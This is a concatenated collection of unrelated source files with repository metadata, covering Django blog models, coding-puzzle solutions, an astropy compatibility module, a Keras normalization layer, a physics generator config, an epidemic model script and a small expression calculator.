"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Framework :: Pytest",
],
python_requires=">=3.7",
setup_requires=["setuptools_scm"],
)
|
[
"defnngj@gmail.com"
] |
defnngj@gmail.com
|
c1d05b21f21eda71db21e7fb3630c69eb6861bcd
|
460e920c18fe887cb2b07ca57fe2ad422ce7d0ce
|
/blog/admin.py
|
73067696a3e0be1372d1b776763f378177638aa8
|
[] |
no_license
|
acid-n/mydjangoBlog
|
893a4c1c7027c79fde3df5dd5c0feb82d8c252f6
|
e1f62b4f1504ecc13dfbd56a1c5be6b28951ba40
|
refs/heads/master
| 2020-09-12T19:14:44.187413
| 2019-11-18T19:07:17
| 2019-11-18T19:07:17
| 222,522,745
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
from django.contrib import admin
from .models import Post, Comment
# Register your models here.
@admin.register(Post)
class PostAdmin(admin.ModelAdmin):
list_display = ('title', 'slug', 'author', 'publish', 'status')
list_filter = ('status', 'created', 'publish', 'author')
search_fields = ('title', 'body')
prepopulated_fields = {'slug': ('title',)}
raw_id_fields = ('author',)
date_hierarchy = 'publish'
ordering = ('status', 'publish')
@admin.register(Comment)
class CommentAdmin(admin.ModelAdmin):
list_display = ('name', 'email', 'post', 'created', 'active')
list_filter = ('active', 'created', 'updated')
search_fields = ('name', 'email', 'body')
|
[
"acid_n@mail.ru"
] |
acid_n@mail.ru
|
fccad511ed6b1da264dece544d72513fcfa263c0
|
16bcda63a6bba61af0c835aabd73b0467696be4a
|
/SymmetricDifference/main.py
|
e1c9af5ac1b754656877c686ed64ee3aaaab231e
|
[] |
no_license
|
ZirvedaAytimur/HackerRank_Python
|
8ea7d629e75b4db31e04c64d102bf7a0a0b5632b
|
175017ed3d8ff11385e12e926b94da97797fc094
|
refs/heads/master
| 2023-03-13T13:00:42.225364
| 2021-03-10T20:36:18
| 2021-03-10T20:36:18
| 288,210,152
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 249
|
py
|
n = int(input())
a = set(map(int, input().split()))
m = int(input())
b = set(map(int, input().split()))
differenceAB = a.difference(b)
differenceBA = b.difference(a)
result = sorted(differenceAB.union(differenceBA))
for i in result:
print(i)
|
[
"zirvedaytimur@gmail.com"
] |
zirvedaytimur@gmail.com
|
eceba96f45693fbccf22d2a2e037432f1a9a458c
|
05caf48bd067c050666026b75686f23d02327378
|
/weekly-contest-141/shortest-path-in-binary-matrix.py
|
b7a5d64bbebde05852b1100a7d86ae4af78e79ec
|
[
"MIT"
] |
permissive
|
elfgzp/Leetcode
|
3b6fa307c699fd5a1ba5ea88988c324c33a83eb7
|
964c6574d310a9a6c486bf638487fd2f72b83b3f
|
refs/heads/master
| 2023-08-21T23:11:38.265884
| 2020-10-17T11:55:45
| 2020-10-17T11:55:45
| 168,635,331
| 3
| 0
|
MIT
| 2023-07-21T03:50:43
| 2019-02-01T03:14:49
|
Python
|
UTF-8
|
Python
| false
| false
| 898
|
py
|
from collections import deque
class Solution:
def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:
n = len(grid)
if grid[0][0] == 1 or grid[-1][-1] == 1:
return -1
queue = deque([((0,0), 1)])
visited = {(0, 0)}
drs = [-1, 0, 1]
dcs = [-1, 0, 1]
while queue:
cur, step = queue.popleft()
r0, c0 = cur
if r0 == n - 1 and c0 == n - 1:
return step
for dr in drs:
for dc in dcs:
r, c = r0 + dr, c0 + dc
if 0 <= r < n and 0 <= c < n and grid[r][c] == 0 and (r, c) not in visited:
visited.add((r, c))
queue.append(((r, c), step + 1))
return -1
|
[
"741424975@qq.com"
] |
741424975@qq.com
|
af3d51a8c6651d6a849e9cf2e188cdf5e8176eaf
|
99e1a15d8f605be456f17608843c309dd8a3260f
|
/src/Pokemon/Abilities/resist_type_ability.py
|
7ae249538edcd5eca1ceabf4685a1ace3dbf6a34
|
[] |
no_license
|
sgtnourry/Pokemon-Project
|
e53604096dcba939efca358e4177374bffcf0b38
|
3931eee5fd04e18bb1738a0b27a4c6979dc4db01
|
refs/heads/master
| 2021-01-17T23:02:25.910738
| 2014-04-12T17:46:27
| 2014-04-12T17:46:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 631
|
py
|
from Pokemon.Abilities.ability import Ability
class ResistTypeAbility(Ability):
""" An Ability with modified effectivensses """
def __init__(self, name, types):
""" """
Ability.__init__(self, name)
self.types = types
def effectivenessOnDefense(self, attackType, target):
""" Returns the effectiveness of the attack when the Pokemon with this ability is defending """
if attackType in self.types:
return self.types[attackType]['effectiveness'], self.types[attackType]['message'].format(header=target.getHeader())
return 1, None
|
[
"cloew123@gmail.com"
] |
cloew123@gmail.com
|
bf5555989d86fa4f6bcf35bcbad1fc8472065722
|
1dacbf90eeb384455ab84a8cf63d16e2c9680a90
|
/pkgs/astropy-1.1.2-np110py27_0/lib/python2.7/site-packages/astropy/utils/compat/misc.py
|
9b56940a7d85a04a5497f9b2f99abf3c2480f150
|
[
"Apache-2.0",
"BSD-3-Clause",
"LicenseRef-scancode-unknown"
] |
permissive
|
wangyum/Anaconda
|
ac7229b21815dd92b0bd1c8b7ec4e85c013b8994
|
2c9002f16bb5c265e0d14f4a2314c86eeaa35cb6
|
refs/heads/master
| 2022-10-21T15:14:23.464126
| 2022-10-05T12:10:31
| 2022-10-05T12:10:31
| 76,526,728
| 11
| 10
|
Apache-2.0
| 2022-10-05T12:10:32
| 2016-12-15T05:26:12
|
Python
|
UTF-8
|
Python
| false
| false
| 3,556
|
py
|
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Simple utility functions and bug fixes for compatibility with all supported
versions of Python. This module should generally not be used directly, as
everything in `__all__` will be imported into `astropy.utils.compat` and can
be accessed from there.
Includes the following fixes:
* The `contextlib.ignored` context manager, which is only available in Python
3.4 or greater.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from ...extern import six
import functools
import sys
__all__ = ['invalidate_caches', 'override__dir__', 'ignored',
'possible_filename']
def possible_filename(filename):
"""
Determine if the ``filename`` argument is an allowable type for a filename.
In Python 3.3 use of non-unicode filenames on system calls such as
`os.stat` and others that accept a filename argument was deprecated (and
may be removed outright in the future).
Therefore this returns `True` in all cases except for `bytes` strings in
Windows on Python >= 3.3.
"""
if isinstance(filename, six.text_type):
return True
elif isinstance(filename, six.binary_type):
return not (sys.platform == 'win32' and
sys.version_info[:2] >= (3, 3))
return False
# Python 3.3's importlib caches filesystem reads for faster imports in the
# general case. But sometimes it's necessary to manually invalidate those
# caches so that the import system can pick up new generated files. See
# https://github.com/astropy/astropy/issues/820
if sys.version_info[:2] >= (3, 3):
from importlib import invalidate_caches
else:
invalidate_caches = lambda: None
def override__dir__(f):
"""
When overriding a __dir__ method on an object, you often want to
include the "standard" members on the object as well. This
decorator takes care of that automatically, and all the wrapped
function needs to do is return a list of the "special" members
that wouldn't be found by the normal Python means.
Example
-------
@override__dir__
def __dir__(self):
return ['special_method1', 'special_method2']
"""
if sys.version_info[:2] < (3, 3):
# There was no straightforward way to do this until Python 3.3, so
# we have this complex monstrosity
@functools.wraps(f)
def override__dir__wrapper(self):
members = set()
for cls in self.__class__.mro():
members.update(dir(cls))
members.update(six.iterkeys(self.__dict__))
members.update(f(self))
return sorted(members)
else:
# http://bugs.python.org/issue12166
@functools.wraps(f)
def override__dir__wrapper(self):
members = set(object.__dir__(self))
members.update(f(self))
return sorted(members)
return override__dir__wrapper
try:
from contextlib import ignored
except ImportError:
from contextlib import contextmanager
@contextmanager
def ignored(*exceptions):
"""A context manager for ignoring exceptions. Equivalent to::
try:
<body>
except exceptions:
pass
Example::
>>> import os
>>> with ignored(OSError):
... os.remove('file-that-does-not-exist')
"""
try:
yield
except exceptions:
pass
|
[
"wgyumg@mgail.com"
] |
wgyumg@mgail.com
|
147cf4364b9e0ec4c97c14d9487f7650af798832
|
0767d96d7d389d0c76b9915f33d19e910f5e3ae2
|
/changingthefoodchain/organizations/management/commands/loadorganizations.py
|
75cf04100d16dd9dbbdd0ba537a4b680f88c6ab4
|
[] |
no_license
|
ebrelsford/changingthefoodchain-back
|
3d7b68aadd97339910a98ea6da0f66ce2af46979
|
58d093ff4f4f211c1e83de099f4bf3981d598588
|
refs/heads/master
| 2021-01-22T09:05:20.114067
| 2016-01-15T02:33:10
| 2016-01-15T02:33:10
| 21,173,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,099
|
py
|
import csv
from django.contrib.gis.geos import Point
from django.core.management.base import BaseCommand
from organizations.models import Organization, Sector, Type
class Command(BaseCommand):
args = 'filename'
help = 'Load the organizations in the given CSV'
type_abbreviations = {
'a': 'advocacy group',
's': 'service organization',
'u': 'union',
'wc': 'workers center',
}
def get_sectors(self, raw):
sectors = [sector.strip() for sector in raw.lower().split('/')]
return [Sector.objects.get_or_create(name=s)[0] for s in sectors]
def get_type(self, name):
fullname = self.type_abbreviations[name.lower()]
type, created = Type.objects.get_or_create(name=fullname)
return type
def get_types(self, raw):
types = [t.strip() for t in raw.lower().split('/')]
return [self.get_type(t) for t in types]
def handle(self, filename, *args, **options):
for row in csv.DictReader(open(filename, 'r')):
try:
point = Point(float(row['longitude']), float(row['latitude']),
srid=4326)
except:
self.stdout.write(u'Failed to get point for %s' % row['Name'])
point = None
organization = Organization(
name=row['Name'],
address_line1=row['Address'],
city=row['City'],
state_province=row['State'],
postal_code=row['Zip'],
email=row['Email'],
phone=row['Phone #'],
site_url=row['website'] or None,
mission=row['Mission'] or None,
centroid=point,
)
try:
organization.save()
organization.sectors.add(*self.get_sectors(row['Food Sector(s)']))
organization.types.add(*self.get_types(row['Organization Type']))
except Exception:
print 'Failed to save organization %s' % organization.name
continue
|
[
"ebrelsford@gmail.com"
] |
ebrelsford@gmail.com
|
c1abfa1d38d1a7389e9f65eaf991440fc0579afd
|
f6fca4fe9923e82bdd69fbca661a4e7df16660cb
|
/kws_streaming/layers/sub_spectral_normalization.py
|
10b924a1b0189041f860da536ea4105cd6ad8052
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
zdeagle/google-research
|
85664eae969cbeff3012bc5b0beb94c557030f9c
|
249751dfe7cb6e0b5be5c2e301d0aed71ab15ff2
|
refs/heads/master
| 2023-09-03T06:44:06.126169
| 2021-11-01T01:44:43
| 2021-11-01T02:11:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sub spectral normalization layer."""
from kws_streaming.layers.compat import tf
class SubSpectralNormalization(tf.keras.layers.Layer):
"""Sub spectral normalization layer.
It is based on paper:
"SUBSPECTRAL NORMALIZATION FOR NEURAL AUDIO DATA PROCESSING"
https://arxiv.org/pdf/2103.13620.pdf
"""
def __init__(self, sub_groups, **kwargs):
super(SubSpectralNormalization, self).__init__(**kwargs)
self.sub_groups = sub_groups
def call(self, inputs):
# expected input: [N, Time, Frequency, Channels]
if inputs.shape.rank != 4:
raise ValueError('input_shape.rank:%d must be 4' % inputs.shape.rank)
input_shape = inputs.shape.as_list()
if input_shape[2] % self.sub_groups:
raise ValueError('input_shape[2]: %d must be divisible by '
'self.sub_groups %d ' %
(input_shape[2], self.sub_groups))
net = inputs
if self.sub_groups == 1:
net = tf.keras.layers.BatchNormalization()(net)
else:
target_shape = [
input_shape[1], input_shape[2] // self.sub_groups,
input_shape[3] * self.sub_groups
]
net = tf.keras.layers.Reshape(target_shape)(net)
net = tf.keras.layers.BatchNormalization()(net)
net = tf.keras.layers.Reshape(input_shape[1:])(net)
return net
def get_config(self):
config = {'sub_groups': self.sub_groups}
base_config = super(SubSpectralNormalization, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
|
[
"copybara-worker@google.com"
] |
copybara-worker@google.com
|
41f97e277f906e0452fb33ce4ea04de915867d9e
|
a8d55aa06c84ba592207d3e784cb449987dbf73d
|
/python/HI/dijet_analysis/pPb8TeV/Pythia8_Dijet120_pp_TuneCUETP8M1_8160GeV_cff.py
|
9d359c1099dc989d03f935217c82f54be254fca2
|
[] |
no_license
|
CmsHI/genproductions
|
1a38e6d00a286ca485cc01f89c476d888a947b7f
|
bda8af4537f692677eafe10148cd17a7d364ebf8
|
refs/heads/master
| 2023-03-07T10:33:28.844648
| 2023-02-03T12:54:52
| 2023-02-03T12:54:52
| 15,395,480
| 0
| 5
| null | 2020-03-21T21:33:13
| 2013-12-23T12:58:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,075
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.Pythia8CommonSettings_cfi import *
from Configuration.Generator.Pythia8CUEP8M1Settings_cfi import *
generator = cms.EDFilter("Pythia8GeneratorFilter",
PythiaParameters = cms.PSet(
pythia8CommonSettingsBlock,
pythia8CUEP8M1SettingsBlock,
parameterSets = cms.vstring('pythia8CommonSettings',
'pythia8CUEP8M1Settings',
'processParameters'),
processParameters = cms.vstring('HardQCD:all = on',
'PhaseSpace:pTHatMin = 120.',
'PhaseSpace:pTHatMax = 9999.'),
),
comEnergy = cms.double(8160.0),
filterEfficiency = cms.untracked.double(1.0),
maxEventsToPrint = cms.untracked.int32(0),
pythiaHepMCVerbosity = cms.untracked.bool(False),
pythiaPylistVerbosity = cms.untracked.int32(0)
)
configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('PYTHIA 8 (unquenched) dijets in NN (pt-hat > 120 GeV) at sqrt(s) = 8.16 TeV')
)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"marta.verweij@cern.ch"
] |
marta.verweij@cern.ch
|
913972683869049d67d35ad24c16ab8a76fb8aea
|
380372bbec9b77df14bb96fc32aca7061cca0635
|
/covid/calc/italy/sird_out.py
|
0839b65487e1954ded6ee16c860c90ae410488da
|
[] |
no_license
|
IchiroYoshida/python_public
|
d3c42dc31b3206db3a520a007ea4fb4ce6c1a6fd
|
37ccadb1d3d42a38561c7708391f4c11836f5360
|
refs/heads/master
| 2023-08-16T17:19:07.278554
| 2023-08-13T21:29:51
| 2023-08-13T21:29:51
| 77,261,682
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
'''
SIRD/Optuna1 model simulation Plot
2020-03-28
'''
import numpy as np
from scipy.integrate import odeint
import matplotlib.pylab as plt
from matplotlib.pylab import rcParams
plt.style.use('seaborn-colorblind')
N = 60480000 # community size
t_max = 200
tspan = np.linspace(0.0, t_max, t_max + 1)
# parameters to fit
alpha = 0.623 # 感染率
beta = 0.0505 # 回復率
fatalityrate= 0.03 # 死亡率
I0 = 9995 # Init Infected patients
def sird(v,t):
global alpha, beta,fatalityrate
# v = [S, I, R, D]
x = alpha *v[0] *v[2] / N # infected rate of the day
y = beta * v[1]
dS = -x # S:Susceptible
dI = x - y # I:Infected
dR = y # R:Recovered or Dead
dD = fatalityrate * y
return np.array([dS, dI, dR, dD])
ini_state = [N-I0, I0, 0, 0]
ode_int = odeint(sird, ini_state, tspan)
num = len(ode_int)
for d in range(num):
print(d,ode_int[d])
|
[
"yoshida.ichi@gmail.com"
] |
yoshida.ichi@gmail.com
|
7a09e0bbbfb0ff3a03a00cbce4ceef84c246cfae
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2177/60760/320775.py
|
e9baa7cea28a2c72ead4bdca35056de12a8b98dc
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
n=int(input())
res=n
if res==11:
print(12)
print("6 7 5 8 4 9 3 10 2 11 1 12",end=" ")
elif res==1:
print(2)
print("1 2",end=" ")
elif res==9:
print(10)
print("5 6 4 7 3 8 2 9 1 10",end=" ")
elif res==13:
print(14)
print("7 8 6 9 5 10 4 11 3 12 2 13 1 14",end=" ")
elif res==35:
print(36)
print("18 19 17 20 16 21 15 22 14 23 13 24 12 25 11 26 10 27 9 28 8 29 7 30 6 31 5 32 4 33 3 34 2 35 1 36",end=" ")
elif res==16:
print(17)
print("9 8 10 7 11 6 12 5 13 4 14 3 15 2 16 1 17",end=" ")
else:
print(res)
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
09179808823e6090a2772bb6dfde9ff15c641ee6
|
86ce7710dfb1a4598d02a8006ebb3077c9101f29
|
/nekidblog/postsapp/models.py
|
a434d6e5778917beda41daf69fd0ec3cfb6c1931
|
[] |
no_license
|
spoliv/test_task_nekidaem_ru
|
33b9fe8db54bf9d588834963fa3c1b9a5ae02159
|
3fa29a95cce5e2eb698827c0e3b8e89177022ab6
|
refs/heads/main
| 2023-01-30T04:48:25.101257
| 2020-12-10T15:45:16
| 2020-12-10T15:45:16
| 318,528,386
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
from django.db import models
from django.contrib.auth.models import User
class Blog(models.Model):
class Meta:
verbose_name = 'Блог'
verbose_name_plural = 'Блоги'
author = models.ForeignKey(User, on_delete=models.CASCADE)
blog_theme = models.CharField(verbose_name='тема блога', max_length=50)
class Post(models.Model):
class Meta:
verbose_name = 'Пост'
verbose_name_plural = 'Посты'
blog = models.ForeignKey(Blog, on_delete=models.CASCADE)
post_title = models.CharField(verbose_name='заголовок поста', max_length=50)
post_body = models.TextField(verbose_name='текст поста', blank=True)
date_created = models.DateTimeField(verbose_name='создан', auto_now_add=True)
# Create your models here.
|
[
"spoliv@rambler.ru"
] |
spoliv@rambler.ru
|
b5015f583a686346339dadaed0cc14a8864fa920
|
b107883be08ea56bd3a56ddb0e2dd8dacce7db2e
|
/src/polystar/utils/dataframe.py
|
e020875b53a3ba4999062cc4d269e2850ea2cef9
|
[] |
no_license
|
PolySTAR-mtl/cv
|
ef7977b62577e520f6c69a9b7891c7f38e307028
|
27564abe89e7dff612e3630c31e080fae4164751
|
refs/heads/master
| 2023-05-01T16:45:19.777459
| 2021-05-30T10:36:10
| 2021-05-30T10:36:10
| 356,053,312
| 0
| 0
| null | 2021-05-30T10:36:11
| 2021-04-08T21:32:06
|
Python
|
UTF-8
|
Python
| false
| false
| 908
|
py
|
from typing import Any, Callable, Iterable, Union
from pandas import DataFrame
Format = Union[str, Callable]
def format_df_column(df: DataFrame, column_name: str, fmt: Format):
df[column_name] = df[column_name].map(fmt.format)
def format_df_columns(df: DataFrame, column_names: Iterable[str], fmt: Format):
for c in column_names:
format_df_column(df, c, fmt)
def format_df_row(df: DataFrame, loc: Any, fmt: Format):
df.loc[loc] = df.loc[loc].map(make_formater(fmt))
def format_df_rows(df: DataFrame, locs: Iterable[Any], fmt: Format):
for loc in locs:
format_df_row(df, loc, fmt)
def make_formater(fmt: Format) -> Callable:
if isinstance(fmt, str):
return fmt.format
return fmt
def add_percentages_to_df(df: DataFrame, axis: int) -> DataFrame:
return df.applymap(str) + df.div(df.sum(axis=axis), axis=(1 - axis)).applymap(" ({:.1%})".format)
|
[
"mathieu@feedly.com"
] |
mathieu@feedly.com
|
6d253e9041fc0f16e07e2166ab6ba8890b19bf1e
|
511fd0cb7e338bc5c2d5a9d60de8166efd5882fe
|
/pyrecs/icp_compat/ICPSequenceFile.py
|
52f9c298bca501818f68f0444fe3b05b72aba2a2
|
[] |
no_license
|
bmaranville/pyrecs
|
43341af4931538e57c8de7655efbcdbdd9099f02
|
29468ae4d8a4a9de5cac8988fd3620f806a71907
|
refs/heads/master
| 2021-01-15T15:45:47.514371
| 2016-11-04T14:07:50
| 2016-11-04T14:07:50
| 5,635,023
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,369
|
py
|
from __future__ import with_statement
from StringIO import StringIO
class PyICPSequence:
"""controls and reads from a sequence file, moving the marker around
it is defined as an iterator, so getting the next element moves the marker
can use syntax "for cmd in PyICPSequenceFile(filename):" to iterate
through file, moving the marker
"""
def __init__(self, marker = '%', data = ''):
self.data = data
self.marker = marker
self.last = ''
self.next_command = ''
self.current_command = ''
def LoadData(self):
return self.data
def ParseData(self):
data = self.LoadData()
current_command = None
seek_pos = 0
datalen = len(data)
not_separator = True
def next_cmd(data, seek_pos):
cmd = ''
not_separator = True
while not_separator and seek_pos < datalen:
next_char = data[seek_pos]
if next_char in [';', '\n', '\r']:
not_separator = False
cmd += next_char
seek_pos += 1
return cmd, seek_pos
new_data = ''
match = False
while seek_pos < datalen and match == False:
cmd, new_seek_pos = next_cmd(data, seek_pos)
marker_loc = cmd.rfind(self.marker)
# check to see if there's anything after the marker - if not, proceed
if marker_loc > -1 and cmd[marker_loc+1:].rstrip('; \t\n\r') == '':
#current_command = cmd[:marker_loc]
match = True # we found it! set the flag
current_command = cmd[:marker_loc].strip('; \t\n\r')
replacement_str = cmd[:marker_loc] + cmd[marker_loc+1:]
new_data = data[:seek_pos]+replacement_str
seek_pos = new_seek_pos
if not match:
seek_pos = 0
# or else we've got a match - what's the next command?
next_command = None
commands_left = 0
next_command_found = False
while seek_pos < datalen:
cmd, new_seek_pos = next_cmd(data, seek_pos)
if cmd.strip('; \t\n\r') == '':
new_data += cmd
else: # we have a non-blank command:
commands_left += 1 # add one to the stack
if not next_command_found:
next_command_found = True
next_command = cmd.rstrip('; \t\n\r'+self.marker)
# check to see if it's already got a marker (or more than one) and clear them
# and then put exactly one marker back
end_of_command = len(cmd.rstrip('; \t\r\n'+self.marker))
cmd = cmd[:end_of_command] + self.marker + cmd[end_of_command:].replace(self.marker, '')
#new_data += cmd[:-1] + self.marker + cmd[-1]
new_data += cmd
seek_pos = new_seek_pos
return current_command, next_command, commands_left, new_data
def GetCurrentCommand(self):
current_command, next_command, commands_left, new_data = self.ParseData()
return current_command
def __len__(self):
current_command, next_command, commands_left, new_data = self.ParseData()
return commands_left
def clear(self):
"""move the marker to the last command"""
while self.__len__() > 0:
self.GetNextCommand()
def GetNextCommand(self):
current_command, next_command, commands_left, new_data = self.ParseData()
self.WriteData(new_data)
return next_command
def WriteData(self, new_data):
self.data = new_data
def __iter__(self):
return self
def next(self):
self.next_command = self.GetNextCommand()
if self.next_command == None:
raise StopIteration
else:
self.last = self.next_command
return self.next_command
#def popleft(self):
# return next(self)
class PyICPSequenceFile(PyICPSequence):
    """controls and reads from a sequence file, moving the marker around

    it is defined as an iterator, so getting the next element moves the marker
    can use syntax "for cmd in PyICPSequenceFile(filename):" to iterate
    through file, moving the marker
    """
    def __init__(self, filename, marker = '%'):
        # filename: path of the sequence file on disk.
        # marker: single-character position marker handled by the base class.
        self.filename = filename
        PyICPSequence.__init__(self, marker)
    def LoadData(self):
        # Re-read the whole sequence file on every parse pass.
        with open(self.filename, 'r') as f:
            data = f.read()
        return data
    def WriteData(self, new_data):
        # Rewrite the file in place with the marker at its new position.
        with open(self.filename, 'w') as f:
            f.write(new_data)
class PyICPSequenceStringIO(PyICPSequence):
    """Sequence backed by an in-memory StringIO-like object."""
    def __init__(self, string_io_obj, marker = '%' ):
        # string_io_obj: any seekable file-like text buffer (e.g. io.StringIO).
        self.string_io_obj = string_io_obj
        PyICPSequence.__init__(self, marker)
    def LoadData(self):
        # Return the entire buffer contents from the beginning.
        self.string_io_obj.seek(0)
        data = self.string_io_obj.read()
        return data
    def WriteData(self, new_data):
        # Bug fix: the original called the unbound StringIO.truncate on the
        # class object, which fails for other file-like buffers, and it never
        # rewound the stream, so truncate/write happened at the old position.
        # Seek first, then truncate, then write — works for any io.StringIO.
        self.string_io_obj.seek(0)
        self.string_io_obj.truncate(0)
        self.string_io_obj.write(new_data)
|
[
"brian.maranville@nist.gov"
] |
brian.maranville@nist.gov
|
bc583257ba2fa8e75999f1420d42612329c9011a
|
f34c9ba52317b2871ef309d25c6a62ada2a4c4e3
|
/2019-1/exemplos/calc/calc-ast.py
|
6121565647ee90707c33f27b56bed0f9abc48cf7
|
[] |
no_license
|
azurah/compiladores-1
|
b2a24e4dc67b39d106803ce431740918feebeddb
|
b8bcd58aa5c0ffd02b9c24aa3eaa64b8827d9263
|
refs/heads/master
| 2022-03-25T06:55:48.714820
| 2019-12-16T14:38:25
| 2019-12-16T14:38:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,577
|
py
|
import ox
import operator as op
# Lexer specification: (TOKEN_NAME, regex) pairs consumed by ox.make_lexer.
lexer_rules = [
    ('NUMBER', r'\d+'),
    ('ADD', r'\+'),
    ('SUB', r'\-'),
    ('MUL', r'\*'),
    ('DIV', r'\/'),
    ('LPAR', r'\('),
    ('RPAR', r'\)'),
    ('VAR', r'[a-zA-Z_]+')
]

lexer = ox.make_lexer(lexer_rules)
tokens = [x for x, _ in lexer_rules]

# Build an (operator, lhs, rhs) tuple node for binary-operator productions.
binop = (lambda x, op, y: (op, x, y))

# Grammar: '+'/'-' over terms and '*'/'/' over atoms (right-associative,
# since the recursion sits on the right of each rule); atoms are integer
# literals, ('var', name) leaves, or parenthesised sub-expressions.
parser = ox.make_parser([
    ('expr : term ADD expr', binop),
    ('expr : term SUB expr', binop),
    ('expr : term', lambda x: x),
    ('term : atom MUL term', binop),
    ('term : atom DIV term', binop),
    ('term : atom', lambda x: x),
    ('atom : NUMBER', int),
    ('atom : VAR', lambda x: ('var', x)),
    ('atom : LPAR expr RPAR', lambda x, y, z: y),
], tokens)
def find_vars(ast, vars=()):
    """Return the set of variable names referenced anywhere in *ast*.

    Leaves (non-tuples) contribute nothing; ('var', name) nodes contribute
    their name; operator nodes contribute the union of their children.
    """
    if not isinstance(ast, tuple):
        return set()
    head, *children = ast
    if head == 'var':
        return set(vars) | {children[0]}
    collected = set()
    for child in children:
        collected.update(find_vars(child))
    return collected
# Dispatch table mapping operator tokens to their Python implementations.
FUNCTIONS = {'+': op.add, '-': op.sub,
             '*': op.mul, '/': op.truediv}


def eval_ast(ast, ctx):
    """Evaluate *ast* recursively, looking variables up in the *ctx* mapping."""
    if not isinstance(ast, tuple):
        # Literal leaf (already an int).
        return ast
    head, *children = ast
    if head == 'var':
        return ctx[children[0]]
    operands = [eval_ast(child, ctx) for child in children]
    return FUNCTIONS[head](*operands)
if __name__ == '__main__':
    # Parse the expression, prompt for each free variable's value, evaluate.
    ast = parser(lexer(input('expr: ')))
    free_vars = find_vars(ast)
    ctx = {x: int(input(x + ': '))
           for x in free_vars}
    print('result:', eval_ast(ast, ctx))
    print('ast:', ast)
|
[
"fabiomacedomendes@gmail.com"
] |
fabiomacedomendes@gmail.com
|
1db6fe1c31490177a0f129ccbd8add2e3939d210
|
ee9655d3ffcdb70ae68692f400096b479b39d0f7
|
/Python/kebabize.py
|
1180f40f74723d5a9da84caa4daaccca95f4a1db
|
[] |
no_license
|
yaelBrown/Codewars
|
4f123387b8c4ea6e55ec1ff5d2ae9b1d674c06cf
|
efa10770b593e48579c256b9d6b69deede64e9ba
|
refs/heads/master
| 2020-11-27T16:02:43.409465
| 2020-03-20T00:59:49
| 2020-03-20T00:59:49
| 229,521,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,091
|
py
|
"""
Modify the kebabize function so that it converts a camel case string into a kebab case.
kebabize('camelsHaveThreeHumps') // camels-have-three-humps
kebabize('camelsHave3Humps') // camels-have-humps
Notes:
the returned string should only contain lowercase letters
"""
import string
def kebabize(string):
    """Convert a camelCase string to kebab-case.

    Digits (and any other non-letters) are dropped; each uppercase letter
    is prefixed with '-'; the result is lowercased with no leading dash.
    """
    kebab = ''.join('-' + ch if ch.isupper() else ch
                    for ch in string if ch.isalpha())
    return kebab.lstrip('-').lower()
# aa = "this is a string"
# print(aa.isalpha())
# print(kebabize("iLike4Cookies"))
# print("-S-O-S"[:1])
print(kebabize("SOS"))
"""
def kebabize(s):
return ''.join(c if c.islower() else '-' + c.lower() for c in s if c.isalpha()).strip('-')
import re
def kebabize(s):
return re.sub('\B([A-Z])', r'-\1', re.sub('\d', '', s)).lower()
import re
def kebabize(s):
s = ''.join([i for i in s if not i.isdigit()])
kebablist = filter(None, re.split("([A-Z][^A-Z]*)", s))
return "-".join(x.lower() for x in kebablist)
"""
|
[
"yaelrbrown@gmail.com"
] |
yaelrbrown@gmail.com
|
8b186ae2a6c66100621dcf603ad1b02c54d99e63
|
e4200b764d0b4ffba65180e54cf84b30ee84efcc
|
/selfdrive/loggerd/SConscript
|
6a392d15d6fdafd6f37d01e59e8c9462835f717c
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
kegman/openpilot
|
c9ba96a72d905956f02c684e065091e023942883
|
54a8614b5a6451154817a4c6c86141c96103ae47
|
refs/heads/kegman-0.7
| 2022-05-22T17:07:16.656336
| 2020-01-23T16:40:55
| 2020-01-23T16:40:55
| 229,979,925
| 105
| 212
|
MIT
| 2022-03-13T05:47:51
| 2019-12-24T17:27:11
|
C
|
UTF-8
|
Python
| false
| false
| 311
|
Import('env', 'messaging', 'common', 'visionipc')
env.Program(['loggerd.cc', 'logger.c', 'raw_logger.cc', 'encoder.c'], LIBS=[
'zmq', 'czmq', 'capnp', 'kj', 'yaml-cpp', 'z',
'avformat', 'avcodec', 'swscale', 'avutil',
